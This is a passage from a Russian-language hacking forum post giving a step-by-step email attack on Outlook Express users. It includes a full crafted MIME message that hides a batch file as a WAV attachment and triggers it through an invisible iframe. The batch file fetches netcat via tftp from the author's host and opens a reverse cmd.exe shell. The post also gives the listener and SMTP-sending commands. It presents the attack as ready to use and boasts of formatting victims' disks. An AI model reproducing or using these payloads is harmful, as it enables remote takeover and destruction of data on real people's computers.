И так создаем hack.txt, с таким вот MIME-кодом. </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">hello hacker-4.comcor-tv.ru mail from:<[email protected]> rcpt to:<[email protected]> data subject: Attack MIME-Version: 1.0 Content-Type: multipart/related; type="multipart/alternative" boundary="1" X_Priority:3 X-Mail-Priority:Normal X-Usenet:1 --1 Content-Type:multipart/alternative; boundary="2" --2 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable <html> <head> </head> <body bgcolor=3D#ffffff> <iframe src=3Dcid:THE-CID height=3D0></iframe> =))) </body> </html> --2-- --1 Content-Type: audio/x-wav; name="attack.bat" Content-Transfer-Encoding: quoted-printable Content-ID: <THE-CID> start /B /WAIT tftp -i hacker-4.comcor-tv.ru get nc.exe C:\winnt\system32\nc.exe start /B nc.exe -d -e cmd.exe hacker-4.comcor-tv.ru 2002 --1 . quit[/QUOTE]<span id='postcolor'> Вот это наш Активный код </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">start /B /WAIT tftp -i hacker-4.comcor-tv.ru get nc.exe C:\winnt\system32\nc.exe start /B nc.exe -d -e cmd.exe hacker-4.comcor-tv.ru 2002[/QUOTE]<span id='postcolor'> В первой строке команда запускает сеанс МС_ДОС без создания нового диалога. В открывшемся сеансе МС_ДОС сначало исполняется команда tftp предназначеная для выгрузки файлов из локального компа на удаленный хост (параметр put) и загрузки файлов из уделенного хоста на локальный комп (параметр get). У нас команда tftp загружает двоичный код (параметр -i) с нашего хоста по адресу hacker-4.comcor-tv.ru в папку c\winnt\nc.exe локального компа. Во второй строке происходит запуск загруженной проги-сервера netcat которая запускает командную оболочку cmd.exe атакованного компа и устанавливает соединение с прогой-клиентом netcate запущеной на нашем хосте в режими прослушки 2002 порта. Файл hack.txt готов? Тогда запускаем прогу TFTPD32 представляющую собой клиент TFTP (для танкистов:Прога обслуживающая запросы TFTP) Почему используем TFTPD32? Потому что на компах с вынь 2000\ХР в отличии от Никса,протокол TFTP поддерживается в ограниченом обьеме и для исполнения команды tftp на хосте с которого мы собираемся загрузить файл должен быть установлен клиент tftp - ( танкистам " иначе команда нихера исполнятся не будет) И так мы запускаем TFTPD32 и нам отображается некий диалог. Клиент TFTPD32 должен быть настроин следующим образом. В поле Base Directory (надо указать папку с файлом nc.exe)(для танкистов c\winnt\nc.exe) В списке Server interface (надо ввести Ip адрес сетевого хоста с которого будет выполняться загрузка файла.) (снова для танкистов IP следует ввести свой) После запуска и настройки проги,начинается прослушка стандартного порта (69) протокола TFTP в ожидании запросов. Далее В отдельном диалоге сеанса МС_ДОС запускаем следующую прогу-клиента удаленного управления. </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">nc-vv-L-p 2002[/QUOTE]<span id='postcolor'> Вылезит такое сообщение listening on (any) 2002 (снова танкистам =) началась работа в режиме клиента удаленного управления,прослушивающего запросы к порту 2002,поступающие с любого хоста) Далее Открываем ещё один диалог сеанса МС_ДОС и с помощью вот этой команды </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">type hack.txt | nc-vv [email protected] 25[/QUOTE]<span id='postcolor'> Если все сраслось по плану и жертва открыла письмо в Аутлук Експрес (на других не тестировалось) На его экране на милисекунду появится диалог сеанса МС_ДОС. То в диалоге клиента TFTPD32 (т.е у тебя) Должны отобразиться сообщения о ходе процесса загрузки файла. Пример. </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">Connection received from xx.xx.xxx. port xx Read request for fail <nc.exe> Mode octet <nc.exe>: send 118 blks, xxxx bytes in 1 s. 0 blk resent[/QUOTE]<span id='postcolor'> Одновременно в диалоге сеанса МС_ДОС в котором запущен клиент удаленного управления netcate отобразится сообщение об установлении связи с атакованным компом. теперь с хостом можно делать,что хочеш. Форматить диски,удалять файлы,и.т.д Одним словом жертва превращена в твоего стевого раба.